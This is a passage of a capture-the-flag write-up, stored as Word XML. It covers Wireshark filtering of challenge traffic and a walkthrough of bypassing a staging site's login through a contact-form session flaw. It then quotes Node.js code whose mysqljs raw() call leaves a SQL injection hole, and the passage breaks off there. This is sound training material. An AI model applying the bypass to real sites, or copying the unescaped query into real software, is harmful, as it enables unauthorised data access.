    <w:p w14:paraId="618EC138" w14:textId="11DDEFF5" w:rsidR="00B955A0" w:rsidRDefault="00B955A0">
      <w:r>
        <w:t xml:space="preserve">I wanted to understand more on how to check presence of the Evil Bit with Wireshark when I came across this post: </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidRPr="00600680">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://blog.benjojo.co.uk/post/evil-bit-RFC3514-real-world-usage</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54D46733" w14:textId="6CCDEE5A" w:rsidR="00B955A0" w:rsidRDefault="00B955A0">
      <w:r>
        <w:t xml:space="preserve">As it turns out, not a lot of applications have native support for the evil bit…however, due to the reserved bit being used, we can still query for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>it’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> presence by another name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333DD53A" w14:textId="71B508E8" w:rsidR="00B955A0" w:rsidRDefault="00DE4E4B">
      <w:r>
        <w:t>The following Wireshark filter will “find the human”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4923A5AA" w14:textId="601C85DD" w:rsidR="00DE4E4B" w:rsidRDefault="00DE4E4B" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE4E4B">
        <w:t>ip.flags.rb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE4E4B">
        <w:t xml:space="preserve"> == 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9E45F4" w14:textId="77777777" w:rsidR="00D6316D" w:rsidRDefault="00D6316D"/>
    <w:p w14:paraId="74E9DFBC" w14:textId="24C5280D" w:rsidR="00DE4E4B" w:rsidRDefault="00DE4E4B">
      <w:r>
        <w:t>(Alternatively, if the filter is set to 1 to find presence of the evil bit, the Troll’s submissions appear.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116E02CF" w14:textId="0C3DA47B" w:rsidR="00DE4E4B" w:rsidRDefault="00DE4E4B">
      <w:r>
        <w:t xml:space="preserve">This filter again finds Muffy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VonDuchess’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> complaint. Using her submission indicating she is in room 1024, we can search for other records referencing that room.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DBABAC" w14:textId="41D6F604" w:rsidR="00DE4E4B" w:rsidRDefault="00DE4E4B" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE4E4B">
        <w:t>urlencoded-form.value</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE4E4B">
        <w:t xml:space="preserve"> contains "1024"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF703C6" w14:textId="77777777" w:rsidR="008D2A0E" w:rsidRDefault="008D2A0E"/>
    <w:p w14:paraId="6EA8BD82" w14:textId="55E4289D" w:rsidR="00DE4E4B" w:rsidRDefault="00DE4E4B">
      <w:r>
        <w:t>This reveals the three complaints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7257D7" w14:textId="1AE54156" w:rsidR="00DE4E4B" w:rsidRDefault="00DE4E4B">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Flud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> submits</w:t>
      </w:r>
      <w:r w:rsidR="00896066">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE4E4B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE4E4B">
        <w:t xml:space="preserve">Lady call front desk. Complain "employee" is rude. Say she is insult and want to speak to manager. Send </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE4E4B">
        <w:t>Flud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE4E4B">
        <w:t xml:space="preserve"> to room. Lady say troll call her towels thief. I say stop steal towels if is bother her.</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3043A4" w14:textId="68083118" w:rsidR="00896066" w:rsidRDefault="00896066">
      <w:r>
        <w:t>Hagg submits, “</w:t>
      </w:r>
      <w:r w:rsidRPr="00896066">
        <w:t>Lady call front desk. I am walk by so I pick up phone. She is ANGRY and shout at me. Say she has never been so insult. I say she probably has but just didn't hear it.</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A68BDB0" w14:textId="2D1B862C" w:rsidR="00DE4E4B" w:rsidRDefault="00DE4E4B">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Yaqh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> submits</w:t>
      </w:r>
      <w:r w:rsidR="00896066">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE4E4B">
        <w:t xml:space="preserve">Lady call desk and ask for more towel. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE4E4B">
        <w:t>Yaqh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE4E4B">
        <w:t xml:space="preserve"> take to room. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE4E4B">
        <w:t>Yaqh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE4E4B">
        <w:t xml:space="preserve"> ask if she want more towel because she is like to steal. She say </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE4E4B">
        <w:t>Yaqh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE4E4B">
        <w:t xml:space="preserve"> is insult. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE4E4B">
        <w:t>Yaqh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE4E4B">
        <w:t xml:space="preserve"> is not insult. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE4E4B">
        <w:t>Yaqh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE4E4B">
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE4E4B">
        <w:t>Yaqh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE4E4B">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F7071A" w14:textId="1D7DE3F6" w:rsidR="00896066" w:rsidRDefault="00896066">
      <w:r>
        <w:t>The answer to submit for this challenge if “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00896066">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00896066">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Hagg </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00896066">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Yaqh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA31019" w14:textId="7FC43609" w:rsidR="00853B73" w:rsidRDefault="00853B73" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Objective 12 – Frost Tower Website Checkup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422DD78A" w14:textId="7535CDCB" w:rsidR="00853B73" w:rsidRDefault="00896066">
      <w:r>
        <w:t xml:space="preserve">To complete this challenge, we are asked to discover the contents of Jack Frost’s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>todo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> list and determine what job position Jack intends to offer Santa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C24CF4C" w14:textId="1755A381" w:rsidR="005843A3" w:rsidRDefault="005843A3">
      <w:r>
        <w:t xml:space="preserve">We are offered the full source code of the website to look for SQL injection issues. Hints indicate the API documentation for express-session and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysqljs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> could be incredibly value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716C70A4" w14:textId="77777777" w:rsidR="005843A3" w:rsidRDefault="005843A3">
      <w:r>
        <w:t xml:space="preserve">There is not much to do on the staging.jackfrosttower.com front page. The source code offers information about other interesting backend pages like dashboard, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>adduser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>resetpass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA0587C" w14:textId="77777777" w:rsidR="00421B43" w:rsidRDefault="005843A3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Almost all pages seem to redirect to the login page. </w:t>
      </w:r>
      <w:r w:rsidR="00421B43">
        <w:t>The “server.js” code actually runs all the site logic, and the individual .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00421B43">
        <w:t>ejs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00421B43">
        <w:t xml:space="preserve"> files lay out the template and design of each page. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9FDD47" w14:textId="3F5B9B8D" w:rsidR="00421B43" w:rsidRDefault="00421B43">
      <w:r>
        <w:t>Checking the server.js code, it appears that pages requiring authentication all require “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>session.uniqueID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” to be set. Additionally, some pages also require that “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>session.userstatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” == 1 for sensitive rights. These values are not stored or configurable on the client side, they appear to be associated with the session as stored on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6E476E" w14:textId="4D2B5771" w:rsidR="005843A3" w:rsidRDefault="00421B43">
      <w:r>
        <w:t xml:space="preserve">The presence of a CSRF check and the authentication requirements for most pages with anything useful made automated scanning or request editing difficult. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6C7C45" w14:textId="28EFF799" w:rsidR="009A7612" w:rsidRDefault="00421B43">
      <w:r>
        <w:t xml:space="preserve">The first step required to access any of the pages behind authentication is to get the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>session.uniqueID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> populated. </w:t>
      </w:r>
      <w:r w:rsidR="009A7612">
        <w:t xml:space="preserve">In a normal, successful sign in, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A7612">
        <w:t>session.uniqueID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A7612">
        <w:t xml:space="preserve"> gets set to the submitted username. However, if the login fails, instead of any session properties getting set, the session is “destroyed.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FA6161" w14:textId="71E02317" w:rsidR="009A7612" w:rsidRDefault="009A7612">
      <w:r>
        <w:t xml:space="preserve">Since we have access to the source code, we can find all places where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>session.uniqueID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> are interacted with to determine if it can be set to any value, which will allow us to at least access authenticated but non-sensitive endpoints. It appears the contact form will set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>session.uniqueID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to the email address submitted on the contact page, but only if the email already exists in the contact database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAF1FF8" w14:textId="46BF67F4" w:rsidR="009A7612" w:rsidRDefault="009A7612">
      <w:r>
        <w:t xml:space="preserve">To exploit this, we can submit the contact form on staging.jackfrosttower.com/contact once, then resubmit a request with the same email address. That will give our </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>session.uniqueID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a value. It does not matter what this value is, since none of the code checks for it to be any certain value, just that it exists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3803C37F" w14:textId="6B555212" w:rsidR="009A7612" w:rsidRDefault="00694B19">
      <w:r>
        <w:t>This session persists, despite being unauthenticated, because when the express-session settings were set up, “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>saveUninitialized</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” was set to True. According to the documentation suggested by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ribb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Bonbowford</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, this setting will save a session to the store even if it hasn’t been modified. It is even noted “choosing false is useful for implementing login sessions.” This departure from best practices, and the use of a single variable name for two purposes, allows “authenticated” access to site functions as long as the session does not get destroyed by failing a login. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433A6A3C" w14:textId="22E12F0E" w:rsidR="00694B19" w:rsidRDefault="00694B19">
      <w:r>
        <w:t xml:space="preserve">After bypassing authentication controls, the </w:t>
      </w:r>
      <w:r w:rsidR="00855FBD">
        <w:t>dashboard displays content from the contacts database. We can access details for the users as well as search. The next step is to discover if any of the new pages we have access to are vulnerable to a SQL injection attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D6E495" w14:textId="059FD379" w:rsidR="00855FBD" w:rsidRDefault="00855FBD">
      <w:r>
        <w:t xml:space="preserve">Checking the queries built in server.js, almost every item that interacts with the database uses the escape function (directly, or via ? substitution—which as per the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysqljs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> documentation is also a safe way to escape user input). The documentation also explains in depth what the escape function actually does to make a query safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8074F0" w14:textId="48AE950F" w:rsidR="00855FBD" w:rsidRDefault="00855FBD">
      <w:r>
        <w:t>Eventually</w:t>
      </w:r>
      <w:r w:rsidR="008D2A0E">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="008D2A0E" w:rsidRPr="008D2A0E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>and do I mean eventually</w:t>
      </w:r>
      <w:r w:rsidR="008D2A0E">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>, I noticed that there was something different and peculiar about the details page. The details page query is coded like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55863A48" w14:textId="77777777" w:rsidR="00AC7DA4" w:rsidRDefault="00AC7DA4" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>app.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('/detail/:id', function(req, res, next) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1976C163" w14:textId="77777777" w:rsidR="00AC7DA4" w:rsidRDefault="00AC7DA4" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    session = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>req.session</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE5B5A6" w14:textId="77777777" w:rsidR="00AC7DA4" w:rsidRDefault="00AC7DA4" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reqparam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>req.params</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36769478" w14:textId="77777777" w:rsidR="00AC7DA4" w:rsidRDefault="00AC7DA4" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    var query = "SELECT * FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uniquecontact</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> WHERE id=";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2AA079" w14:textId="77777777" w:rsidR="00AC7DA4" w:rsidRDefault="00AC7DA4" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="445B3CD7" w14:textId="77777777" w:rsidR="00AC7DA4" w:rsidRDefault="00AC7DA4" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>session.uniqueID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B39D9BF" w14:textId="77777777" w:rsidR="00AC7DA4" w:rsidRDefault="00AC7DA4" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="756365D3" w14:textId="77777777" w:rsidR="00AC7DA4" w:rsidRDefault="00AC7DA4" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01465029" w14:textId="77777777" w:rsidR="00AC7DA4" w:rsidRDefault="00AC7DA4" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reqparam.indexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(',') &gt; 0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017DD5CB" w14:textId="77777777" w:rsidR="00AC7DA4" w:rsidRDefault="00AC7DA4" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                var ids = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reqparam.split</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(',');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537F7642" w14:textId="77777777" w:rsidR="00AC7DA4" w:rsidRDefault="00AC7DA4" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reqparam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "0";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE89914" w14:textId="77777777" w:rsidR="00AC7DA4" w:rsidRDefault="00AC7DA4" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                for (var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">=0; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ids.length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>++){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0545705B" w14:textId="77777777" w:rsidR="00AC7DA4" w:rsidRDefault="00AC7DA4" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    query += </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tempCont.escape</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>m.raw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(ids[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F40F9A" w14:textId="77777777" w:rsidR="00AC7DA4" w:rsidRDefault="00AC7DA4" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    query += " OR id="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550757CB" w14:textId="77777777" w:rsidR="00AC7DA4" w:rsidRDefault="00AC7DA4" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BFE037" w14:textId="77777777" w:rsidR="00AC7DA4" w:rsidRDefault="00AC7DA4" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                query += "?";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D094CCF" w14:textId="77777777" w:rsidR="00AC7DA4" w:rsidRDefault="00AC7DA4" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            }else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D48F31" w14:textId="77777777" w:rsidR="00AC7DA4" w:rsidRDefault="00AC7DA4" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                query = "SELECT * FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uniquecontact</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> WHERE id=?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D863D84" w14:textId="77777777" w:rsidR="00AC7DA4" w:rsidRDefault="00AC7DA4" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F2CE50" w14:textId="77777777" w:rsidR="00AC7DA4" w:rsidRDefault="00AC7DA4" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        } catch (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE1B957" w14:textId="77777777" w:rsidR="00AC7DA4" w:rsidRDefault="00AC7DA4" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            console.log(error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00901620" w14:textId="77777777" w:rsidR="00AC7DA4" w:rsidRDefault="00AC7DA4" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>res.sendStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(500);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFF1C3F" w14:textId="458B15C6" w:rsidR="00855FBD" w:rsidRDefault="00AC7DA4" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CF1B0C" w14:textId="3B4D4984" w:rsidR="00AC7DA4" w:rsidRDefault="00AC7DA4" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F6B59BB" w14:textId="1B1950B7" w:rsidR="00AC7DA4" w:rsidRDefault="00AC7DA4" w:rsidP="00AC7DA4">
      <w:r>
        <w:t>This endpoint actually can receive a comma separated list of IDs and retrieve multiple items from the table. If a single ID is submitted, it gets crafted using the escape character—“</w:t>
      </w:r>
      <w:r w:rsidRPr="008D2A0E">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D2A0E">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>uniquecontact</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D2A0E">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE id=?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” However, if multiple IDs are submitted, the script iterates through each one to build the full DB query. It adds an escape to the end, but the first item in the array is read using the raw function. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysqljs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
